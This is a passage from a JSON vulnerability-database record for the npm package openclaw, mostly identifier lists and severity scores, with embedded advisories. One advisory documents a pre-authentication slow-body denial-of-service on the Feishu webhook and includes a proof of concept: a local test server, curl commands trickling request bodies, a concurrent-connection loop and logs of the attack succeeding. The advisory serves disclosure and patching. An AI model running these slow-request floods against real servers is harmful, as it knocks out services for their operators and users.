"vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12" } ], "aliases": [ "CVE-2026-43526", "GHSA-2767-2q9v-9326" ], "risk_score": 3.8, "exploitability": "0.5", "weighted_severity": "7.5", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9kgh-wj9w-ykff" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90871?format=api", "vulnerability_id": "VCID-9pj9-7b12-jbea", "summary": "OpenClaw has incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant)\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n# Advisory Details\n\n**Title**: Incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant)\n\n**Description**:\n\n### Summary\n\nThe patch for CVE-2026-32011 tightened pre-auth body parsing limits (from 1MB/30s to 64KB/5s) across several webhook handlers. However, the **Feishu extension's webhook handler** was not included in the patch and still accepts request bodies with the old permissive limits (1MB body, 30-second timeout) **before** verifying the webhook signature. An unauthenticated attacker can exhaust server connection resources by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint.\n\n### Details\n\nIn `extensions/feishu/src/monitor.ts`, the webhook HTTP handler uses `installRequestBodyLimitGuard` with permissive limits at lines 276-278:\n\n```typescript\nconst FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024; // 1MB (line 26)\nconst FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000; // 30s (line 27)\n\n// ... in monitorWebhook(), line 276-278:\nconst guard = installRequestBodyLimitGuard(req, res, {\n maxBytes: FEISHU_WEBHOOK_MAX_BODY_BYTES, // 1MB\n timeoutMs: FEISHU_WEBHOOK_BODY_TIMEOUT_MS, // 30s\n responseFormat: \"text\",\n});\n```\n\nThe body guard is installed at line 276 **before** the request reaches the Lark SDK's `adaptDefault` webhook handler (line 284), which performs signature verification. This means:\n\n1. Any unauthenticated HTTP POST is accepted\n2. The server waits up to 30 seconds for the body to arrive\n3. Each connection can buffer up to 1MB\n4. Authentication only happens after the body is fully read\n\nThe patched handlers (Mattermost, MSTeams, Google Chat, etc.) now use tight pre-auth limits:\n```typescript\nconst PREAUTH_MAX_BODY_BYTES = 64 * 1024; // 64KB\nconst PREAUTH_BODY_TIMEOUT_MS = 5_000; // 5s\n```\n\nThe Feishu extension was missed because it resides in `extensions/feishu/` (a plugin workspace) rather than in the core `src/` directory.\n\n**Attack chain:**\n```\n[Attacker sends slow HTTP POST to /feishu/events]\n → Rate limit check: passes (under 120 req/min)\n → Content-Type check: application/json, passes\n → installRequestBodyLimitGuard(1MB, 30s): installed\n → Body trickles at 1 byte/sec for 30 seconds\n → × 50 concurrent connections = connection exhaustion\n → Legitimate Feishu webhook deliveries blocked\n```\n\n### PoC\n\n**Prerequisites:** Docker installed.\n\n**Step 1:** Create a minimal test server reproducing the vulnerable body parsing:\n\n```bash\ncat > /tmp/feishu_webhook_server.js << 'EOF'\nconst http = require(\"http\");\nconst VULN_TIMEOUT = 30_000; // Vulnerable: 30s (same as Feishu handler)\nconst PATCH_TIMEOUT = 5_000; // Patched: 5s (what it should be)\n\nfunction bodyGuard(req, res, timeoutMs) {\n let done = false;\n const timer = setTimeout(() => {\n if (!done) { done = true; res.statusCode = 408; res.end(\"Request body timeout\"); req.destroy(); }\n }, timeoutMs);\n req.on(\"end\", () => { done = true; clearTimeout(timer); });\n req.on(\"close\", () => { done = true; clearTimeout(timer); });\n}\n\nhttp.createServer((req, res) => {\n if (req.url === \"/healthz\") { res.end(\"OK\"); return; }\n if (req.method !== \"POST\") { res.writeHead(405); res.end(); return; }\n const timeout = req.url === \"/feishu/events\" ? VULN_TIMEOUT : PATCH_TIMEOUT;\n console.log(`[${req.url}] +conn`);\n bodyGuard(req, res, timeout);\n res.on(\"finish\", () => console.log(`[${req.url}] -conn`));\n}).listen(3000, () => console.log(\"Listening on :3000\"));\nEOF\nnode /tmp/feishu_webhook_server.js &\nsleep 1\n```\n\n**Step 2:** Verify the vulnerability — slow body holds connection for the full timeout:\n\n```bash\n# Vulnerable endpoint: connection stays open for ~10 seconds (max 30s)\ntime (echo -n '{\"t\":\"'; sleep 10; echo '\"}') | \\\n curl -s -o /dev/null -w \"status: %{http_code}\\n\" \\\n -X POST http://localhost:3000/feishu/events \\\n -H \"Content-Type: application/json\" \\\n -H \"Content-Length: 65536\" \\\n --data-binary @- --max-time 35\n\n# Patched endpoint: connection terminated after ~5s\ntime (echo -n '{\"t\":\"'; sleep 10; echo '\"}') | \\\n curl -s -o /dev/null -w \"status: %{http_code}\\n\" \\\n -X POST http://localhost:3000/patched/events \\\n -H \"Content-Type: application/json\" \\\n -H \"Content-Length: 65536\" \\\n --data-binary @- --max-time 35\n```\n\n**Step 3:** Batch exploit — 10 concurrent slow connections:\n\n```bash\nfor i in $(seq 1 10); do\n (echo -n 'A'; sleep 15) | \\\n curl -s -o /dev/null -X POST http://localhost:3000/feishu/events \\\n -H \"Content-Type: application/json\" \\\n -H \"Content-Length: 65536\" \\\n --data-binary @- --max-time 35 &\ndone\nwait\n```\n\n### Log of Evidence\n\n**Exploit result (vulnerable /feishu/events):**\n```\n=== Feishu Webhook Pre-Auth Slow-Body DoS ===\nTarget: localhost:3000/feishu/events\nConcurrent connections: 10\n\n [conn-0] held open for 15.0s (15B sent) [SUCCESS]\n [conn-1] held open for 15.0s (15B sent) [SUCCESS]\n [conn-2] held open for 15.0s (15B sent) [SUCCESS]\n [conn-3] held open for 15.0s (15B sent) [SUCCESS]\n [conn-4] held open for 15.0s (15B sent) [SUCCESS]\n [conn-5] held open for 15.0s (15B sent) [SUCCESS]\n [conn-6] held open for 15.0s (15B sent) [SUCCESS]\n [conn-7] held open for 15.0s (15B sent) [SUCCESS]\n [conn-8] held open for 15.0s (15B sent) [SUCCESS]\n [conn-9] held open for 15.0s (15B sent) [SUCCESS]\n\n=== Results ===\nConnections held open (SUCCESS): 10/10\n[SUCCESS] Pre-auth slow-body DoS confirmed!\n```\n\n**Control result (patched /patched/events with 5s timeout):**\n```\n=== CONTROL: Patched Webhook Body Limits (64KB/5s) ===\nTarget: localhost:3000/patched/events\n\n [conn-0] RESET after 8.0s (8B)\n [conn-1] RESET after 8.0s (8B)\n ...\n [conn-9] RESET after 8.0s (8B)\n\nAvg connection hold time: 8.0s (5s timeout + stagger delay)\n```\n\n**Server-side Docker logs confirming the discrepancy:**\n```\n[feishu-vulnerable] +conn (active: 1)\n[feishu-vulnerable] +conn (active: 10) ← No disconnections during 15s attack\n[patched-control] +conn (active: 20)\n[patched-control] -conn after 5.0s (active: 19) ← ALL terminated at 5s\n[patched-control] -conn after 5.0s (active: 10)\n```\n\n### Impact\n\nAn unauthenticated attacker can cause a **Denial of Service** against any OpenClaw instance running the Feishu channel in webhook mode. The Feishu webhook endpoint must be publicly accessible for Feishu to deliver webhooks, so the attacker can directly target it.\n\nWith ~50 concurrent slow HTTP connections (each trickling 1 byte/second), the attacker can:\n- Exhaust the server's connection handling capacity for 30 seconds per wave\n- Block legitimate Feishu webhook deliveries (messages not reaching the bot)\n- Consume up to 50MB of memory (50 × 1MB buffer) per attack wave\n\nThe attack is trivial — it only requires sending slow HTTP POST requests. No valid Feishu webhook signature or any other credentials are needed.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.2.22\n- **Patched versions**: None\n\n### Severity\n- **Severity**: Medium\n- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n\n### Weaknesses\n- **CWE**: CWE-400: Uncontrolled Resource Consumption\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27) | Permissive body limit constants: `FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024` (1MB) and `FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000` (30s) — should be 64KB/5s to match the CVE-2026-32011 patch. |\n| [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280) | `installRequestBodyLimitGuard` call in `monitorWebhook()` using the permissive constants — this guard runs before authentication (the Lark SDK handler at line 284). |", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35665", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29524", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29454", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00113", "scoring_system": "epss", "scoring_elements": "0.29487", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35665" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:57:19Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35665", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35665" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:57:19Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing" }, { "reference_url": "https://github.com/advisories/GHSA-w6m8-cqvj-pg5v", "reference_id": "GHSA-w6m8-cqvj-pg5v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w6m8-cqvj-pg5v" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg", "reference_id": "GHSA-x4vp-4235-65hg", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-35665", "GHSA-w6m8-cqvj-pg5v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9pj9-7b12-jbea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91302?format=api", "vulnerability_id": "VCID-9uyu-y9qv-u7e1", "summary": "OpenClaw: Gateway HTTP Session History Route Bypasses Operator Read Scope\n## Summary\n\nGateway HTTP Session History Route Bypasses Operator Read Scope\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nThe HTTP `/sessions/:sessionKey/history` route previously authenticated bearer tokens but skipped the same `operator.read` check used by `chat.history` over WebSocket. Commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea` makes HTTP callers declare operator scopes and rejects history reads that do not include `operator.read`.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`.\n\n## Fix Commit(s)\n\n- `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35657", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08981", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08979", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08998", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35657" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": 